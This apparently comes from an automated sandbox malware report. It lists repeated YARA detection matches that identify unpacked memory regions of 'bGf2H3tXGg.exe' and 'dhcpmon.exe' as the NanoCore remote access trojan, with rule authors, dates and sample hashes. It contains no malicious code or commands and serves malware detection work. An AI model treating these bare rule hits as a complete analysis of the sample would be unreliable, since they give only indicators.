        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.24787c8.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.24787c8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.356783d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.356783d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.373c0d6.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.373c0d6.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.258cc88.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.258cc88.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.23fca20.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.23fca20.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.35e3214.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.35e3214.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.340c550.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.340c550.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.3470831.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.3470831.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.3513214.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.3513214.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.25cba7c.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.25cba7c.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.2457edc.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.2457edc.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.346c208.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.346c208.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.2464158.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.2464158.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.346c208.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.346c208.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.3513214.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.3513214.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
